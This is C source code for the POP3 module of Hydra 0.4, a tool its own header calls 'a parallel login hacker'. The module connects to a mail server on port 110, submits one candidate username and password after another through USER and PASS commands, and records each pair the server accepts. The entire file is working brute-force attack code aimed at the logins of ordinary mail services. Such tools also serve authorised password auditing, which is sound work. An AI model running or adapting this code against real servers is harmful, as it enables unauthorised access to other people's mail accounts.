/*  
 * Hydra 0.4 - a parallel login hacker 
 * (c) 2000 by Van Hauser / THC <vh@reptile.rug.ac.be>, 
 *             Plasmoid / THC <plasmoid@pimmel.com> 
 * The Hacker's Choice - http://www.infowar.co.uk/thc 
 */

#include <hydra-mod.h>

extern char *HYDRA_EXIT;

char *pbuf;

int start_pop3(int s, unsigned char options, char *miscptr, FILE * fp)
{
    char *empty = "\"\"";
    char *login, *pass, pbuffer[300];

    if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) ==
	0) return 3;
    if (strlen(login = hydra_get_next_login()) == 0)
	login = empty;
    if (strlen(pass = hydra_get_next_password()) == 0)
	pass = empty;

    while (hydra_data_ready(s)) {
	if ((pbuf = hydra_receive_line(s)) == NULL)
	    return (1);
	free(pbuf);
    }

    snprintf(pbuffer, sizeof(pbuffer), "USER %s\n", login);
    if (hydra_send(s, pbuffer, strlen(pbuffer), 0) < 0) {
	return 1;
    }
    if ((pbuf = hydra_receive_line(s)) == NULL)
	return (1);
    if (pbuf[0] != '+') {
	fprintf(stderr,
		"Error: POP3 protocol error or service shutdown: %s\n",
		pbuf);
	return (3);
    }
    free(pbuf);

    snprintf(pbuffer, sizeof(pbuffer), "PASS %s\n", pass);
    if (hydra_send(s, pbuffer, strlen(pbuffer), 0) < 0) {
	return 1;
    }
    if ((pbuf = hydra_receive_line(s)) == NULL)
	return (1);
    if (pbuf[0] == '+') {
	hydra_report_found(fp);
	hydra_completed_pair();
	return 1;
    }
    free(pbuf);
    hydra_completed_pair();

    return 2;
}

void service_pop3(unsigned long int ip, int sp, unsigned char options,
		  char *miscptr, FILE * fp)
{
    int run = 1, next_run, sock = -1;

    hydra_register_socket(sp);
    while (1) {
	switch (run) {
	case 1:		/* connect and service init function */
	    if (sock >= 0) {
		while (hydra_data_ready(sock)) {
		    pbuf = hydra_receive_line(sock);
		    if (pbuf != NULL)
			free(pbuf);
		}
		sock = hydra_disconnect(sock);
	    }
	    if ((sock = hydra_connect_tcp(ip, 110)) < 0) {
		fprintf(stderr,
			"Error: Child with pid %d terminating, can not connect\n",
			getpid());
		hydra_child_exit();
	    }
	    pbuf = hydra_receive_line(sock);
	    if (pbuf == NULL || pbuf[0] != '+') {	/* check the first line */
		fprintf(stderr,
			"Error: Not an POP3 protocol or service shutdown: %s\n",
			pbuf);
		hydra_child_exit();
		exit(-1);
	    }
	    free(pbuf);
	    next_run = 2;
	    break;
	case 2:		/* run the cracking function */
	    next_run = start_pop3(sock, options, miscptr, fp);
	    break;
	case 3:		/* clean exit */
	    if (sock >= 0)
		sock = hydra_disconnect(sock);
	    hydra_child_exit();
	    return;
	default:
	    fprintf(stderr, "Caught unknown return code, exiting!\n");
	    hydra_child_exit();
	    exit(-1);
	}
	run = next_run;
    }
}
